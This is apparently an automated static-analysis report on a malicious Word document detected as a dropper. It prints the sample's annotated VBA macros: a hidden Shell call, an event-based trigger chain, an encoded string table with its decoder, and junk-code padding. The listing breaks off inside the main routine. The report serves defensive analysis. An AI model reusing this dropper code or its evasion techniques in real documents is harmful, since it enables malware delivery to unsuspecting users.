Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72dc66870997ab86…

MALICIOUS

Office (OLE)

52.5 KB Created: 2018-07-26 16:02:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: d77a30343e57e344943dada272c20739 SHA-1: 8ca992a279faf88c53c49c9d5d4f22e917a98192 SHA-256: 72dc66870997ab86d9f0d604347d600fa3e63dd117aca96aafe70c8c116d4178
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. The `TextBox2_Change` subroutine in the `UserForm1` object calls the `Shell` function with whatever string is held in the form control `UserForm1.TextBox2`. This indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent' further supports this dropper functionality.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-7147117-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7147117-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4733 bytes
SHA-256: 2936a2abf4d839df5627af83019dcd0a470b8ad3a3fe2bbda19a028b02342ea1
Preview script
First 1,000 lines of the extracted script
' === Module: ThisDocument (the document's own code module) ===
' The Attribute VB_* lines are exported module metadata, not executable code.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Event handler in the document module. The name follows the VBA
' <control>_<event> convention, so it presumably runs when Frame1 is laid out
' (i.e. when the form is shown) - confirm the actual trigger in a sandbox.
' It passes the literal "102" to xxhukojiauxxx, which writes that value into
' UserForm1.TextBox3; that write raises TextBox3_Change, which is how the rest
' of the macro is started (TextBox3_Change -> folop -> AVOKSARAT). There is no
' AutoOpen/Document_Open in the visible listing: control events are the trigger.
Private Sub Frame1_Layout()
xxhukojiauxxx "102"
End Sub

' === Module: UserForm1 (form code-behind; its text boxes are used as data
' stores and its Change events as call triggers) ===
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6D4711E7-9330-4314-8E13-66627540D17D}{A893FDF4-5DF7-4073-90C3-87E766F20776}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Execution sink flagged by the OLE_VBA_SHELL heuristic. Whenever the contents
' of TextBox2 change, the new contents are passed to Shell as the command line.
' lokna = 0 is Shell's WindowStyle argument (vbHide), so the spawned process has
' no visible window. The command string is not built here: nothing in the
' visible listing writes TextBox2 (AVOKSARAT is truncated), so confirm the
' writer in a sandbox. No Dim / Option Explicit: both locals are implicit Variants.
Private Sub TextBox2_Change()
lokna = 0
loknaf = UserForm1.TextBox2
Shell loknaf, lokna
End Sub

' Change-event handler for TextBox3: any write to that control (xxhukojiauxxx
' does this from Frame1_Layout) runs folop. Using a control event as the call
' trigger keeps the call graph out of a plain search for auto-run procedure names.
Private Sub TextBox3_Change()
folop
End Sub

' Bridge from the TextBox3 event into the main routine AVOKSARAT.
' rade = 12 / If rade = 12 is always true - the condition is padding.
' On Error Resume Next followed by CInt("1E+1000"): an Integer cannot hold that
' value, so the conversion raises a runtime error that Resume Next discards, and
' r is never used. This looks like an error-handling / anti-emulation probe -
' TODO confirm. Note the handler stays active for the AVOKSARAT call, so an
' unhandled error raised inside the payload routine would propagate here and be
' swallowed as well; a failed stage does not surface as a VBA error.
Function folop()
rade = 12
On Error Resume Next
r = CInt("1E+1000")
If rade = 12 Then
AVOKSARAT
End If
End Function

' === Module: faststea (encoded string table) ===
Attribute VB_Name = "faststea"
' String table: returns one of nine opaque constants selected by index 1..9,
' or a tenth when armkraft is the string "A". The values are not plain text;
' they appear to be encoded, and AVOKSARAT passes each one through flanglas
' (not in the visible listing - presumably the decoder, cf. the TextBox1-keyed
' substitution in AYAKSNEVDEM; TODO confirm). The key material (the contents
' of UserForm1.TextBox1) is not part of the extracted macro source, so these
' constants cannot be decoded from this listing alone.
' `If 1 = 2 Then / End If` at the top is dead code (junk padding).
Function brasiltim(armkraft)
If 1 = 2 Then
End If
Select Case armkraft
Case 1
brasiltim = "']z7$'7jhopalvpmm7{}jhopalvpmm7{{xf['sgh[7"
Case 2
brasiltim = ".\lsag[c;7-"
Case 3
brasiltim = ",%.[po2h)bp's7ldlsp]|[ps|op)'mgp[s,|zho[mhkzxgmp.-"
Case 4
brasiltim = ":}}3s]j3 "
Case 5
brasiltim = "|p""p}},1lskas2jah'pll7}}3s]j3 "
Case 6
brasiltim = "|p""p}}1_sad%"
Case 7
brasiltim = ".}}vssj6$$jak'sg'pjgmmkal|'h]$]h(|gp}},_'ks'v%"
Case 8
brasiltim = ".}}vssj6$$oks'vmgxp]ksspal|'h]$]h(|gp}},_}{{757hfs2xgmp72p['hzg[c7kl'gg72xgmpjksv73s]j3 "
Case 9
brasiltim = "|)ks17lskas2jah'pll7}3s]j3 "
End Select
' Separate check after the Select: a numeric index never equals "A", so the two
' lookups do not interfere.
If armkraft = "A" Then
brasiltim = "|)ks}72og[zholsdmp7vgzzp[{"
End If
End Function

' === Module: ii543210 (random-name generator and the TextBox1-keyed decoder) ===
Attribute VB_Name = "ii543210"
' Returns a random lowercase string. hexlumph = 9 * Rnd() + 6 picks a length in
' [6, 15) (kept fractional; the helper stops once its counter is no longer below
' it) and sitzmish appends one random letter per step into infochris.
' Rnd() is used without Randomize, so VBA's default generator starts from the
' same seed each session and the "random" names repeat across runs - worth
' knowing when building detections (TODO verify on a live host).
' Called four times at the start of AVOKSARAT; presumably produces throwaway
' names for the later stages.
Function virusmodem()
hexlumph = 9 * Rnd() + 6
infochris = ""
colleenfgh = 1
sitzmish colleenfgh, infochris, hexlumph
virusmodem = infochris
End Function

' Recursive string builder: while cetedult < dorchester, obtain one character
' Chr(24 * Rnd() + 97) via ruyguitar (roughly 'a'..'y'), append it to the ByRef
' accumulator bonerppp, increment the ByRef counter and recurse. Both the
' counter and the accumulator are the caller's variables, so the result is
' delivered through bonerppp rather than a return value.
' Tail recursion in place of a simple For loop - a common obfuscation shape.
Function sitzmish(ByRef cetedult, ByRef bonerppp, dorchester)
If cetedult < dorchester Then
louDe500 = ""
ruyguitar louDe500, 24 * Rnd() + 97
bonerppp = bonerppp + louDe500
cetedult = cetedult + 1
sitzmish cetedult, bonerppp, dorchester
End If
End Function

' Thin wrapper over Chr: stores Chr(slipipip) in the ByRef argument and returns 1.
' The return value is ignored by its only visible caller (sitzmish); the
' fractional Double passed in is coerced to an integer code by Chr.
Function ruyguitar(ByRef iikslobogloT, slipipip)
iikslobogloT = Chr(slipipip)
ruyguitar = 1
End Function

' Character-substitution decoder. For each character of chengyue: uhwagest
' returns its 1-based position in the alphabet string held in
' UserForm1.TextBox1, and VONAMHARZIAF returns the character 7 positions
' earlier in that same alphabet (wrapping around at the start). In other words
' a fixed-shift substitution whose key is the form control's contents - the key
' is not part of the extracted macro text, so the brasiltim constants cannot be
' decoded from this listing alone.
' No caller is visible in this excerpt (AVOKSARAT is truncated) - TODO confirm
' where it is used (possibly via flanglas).
Function AYAKSNEVDEM(chengyue)
adulstro = ""
For i = 1 To Len(chengyue)
adulstro = adulstro + VONAMHARZIAF(uhwagest(Mid(chengyue, i, 1)), 7)
Next i
AYAKSNEVDEM = adulstro
End Function

' Alphabet lookup with wrap-around: returns the single character of
' UserForm1.TextBox1 at position (zhongchao - koneluka); when that position
' drops below 1 it indexes from the end instead (Len + zhongchao - koneluka).
' The form control is re-read on every call. There is no range check: Mid past
' the end of the string silently returns "".
Function VONAMHARZIAF(zhongchao, koneluka)
If zhongchao - koneluka < 1 Then
VONAMHARZIAF = Mid(UserForm1.TextBox1, Len(UserForm1.TextBox1) + zhongchao - koneluka, 1)
Else
VONAMHARZIAF = Mid(UserForm1.TextBox1, zhongchao - koneluka, 1)
End If
End Function

' Returns the 1-based position of character iikslobogloT within
' UserForm1.TextBox1, located by the recursive helper ebmoney41. Both ByRef
' slots start at 1; the search counter AVONIDTELAYLAHS is what is returned
' (JULY1880 is set to the same value on a hit and is otherwise unused here).
' If the character is absent from the alphabet the helper has no base case -
' see the note on ebmoney41.
Function uhwagest(iikslobogloT)
AVONIDTELAYLAHS = 1
JULY1880 = 1
ebmoney41 AVONIDTELAYLAHS, JULY1880, iikslobogloT
uhwagest = AVONIDTELAYLAHS
End Function
  
' Recursive linear search for iikslobogloT in UserForm1.TextBox1 (re-read on
' every call). On a match JULY1880 takes the current index; otherwise the index
' is incremented and the function recurses.
' NOTE(review): the guard `cetedult < savagemars` uses a name that is neither a
' parameter nor a local of this function. With no Option Explicit in the module
' it is an uninitialised Variant (Empty, which compares as 0), so the guard is
' effectively always true for a non-empty TextBox1 and the intended bound check
' on the index is missing. A character that is not in the alphabet therefore
' makes Mid return "" forever and the recursion runs until "Out of stack space";
' that error would propagate up and be swallowed by folop's On Error Resume
' Next. TODO confirm in a sandbox.
Function ebmoney41(ByRef AVONIDTELAYLAHS, ByRef JULY1880, iikslobogloT)
zeishowp = UserForm1.TextBox1
savagemars = Len(zeishowp)
If cetedult < savagemars Then
    If iikslobogloT = Mid(zeishowp, AVONIDTELAYLAHS, 1) Then
    JULY1880 = AVONIDTELAYLAHS
    Else
    AVONIDTELAYLAHS = AVONIDTELAYLAHS + 1
    ebmoney41 AVONIDTELAYLAHS, JULY1880, iikslobogloT
    End If
End If
End Function

' === Module: iiksvonagimS (string concatenation helper, junk function, and the
' TextBox3 writer that kicks off execution) ===
Attribute VB_Name = "iiksvonagimS"
' Appends Kaelabel and then jensenanna onto the ByRef accumulator jasper433.
' The + operator concatenates when the operands are strings (on Variants it can
' also add numerically; the visible callers pass "", the TextBox4 control and a
' virusmodem() string). No return value is assigned. AVOKSARAT uses this to
' assemble a longer string piece by piece; what that string is finally used for
' lies outside the visible listing.
Function vopalosoK(ByRef jasper433, Kaelabel, jensenanna)
jasper433 = jasper433 + Kaelabel + jensenanna
End Function

' Returns the constant "ee". No caller in the visible listing - presumably
' junk code added to pad the module.
Function diggerprof()
diggerprof = "ee"
End Function

' Writes goldlover into UserForm1.TextBox3. That assignment raises
' TextBox3_Change, so this one-liner is the real entry point into the macro's
' logic (-> folop -> AVOKSARAT). Called from Frame1_Layout with "102"; the
' value itself is not read anywhere in the visible listing. The ByRef argument
' is never modified and no return value is assigned.
Function xxhukojiauxxx(ByRef goldlover)
UserForm1.TextBox3 = goldlover
End Function

' === Module: nikkiBXX (main routine AVOKSARAT; the extracted listing is
' truncated partway through it) ===
Attribute VB_Name = "nikkiBXX"
Function AVOKSARAT()
ayaksvokszrK = virusmodem()
zoljants = virusmodem()
ronspayw = virusmodem()
ruxcamaro = virusmodem()

popeyeflip = ""

flanglas (brasiltim(1))
vopalosoK popeyeflip, UserForm1.TextBox4, ayaksvokszrK
flanglas (brasiltim(2))
vopalosoK popeyeflip, UserForm1.TextBox4, zoljants
flanglas (brasiltim(3))
vopalosoK popeyeflip, UserForm1.TextBox4, zoljants
flanglas (brasiltim(4))
vopalosoK popeyeflip, UserForm1.TextBox4, ronspay
... (truncated)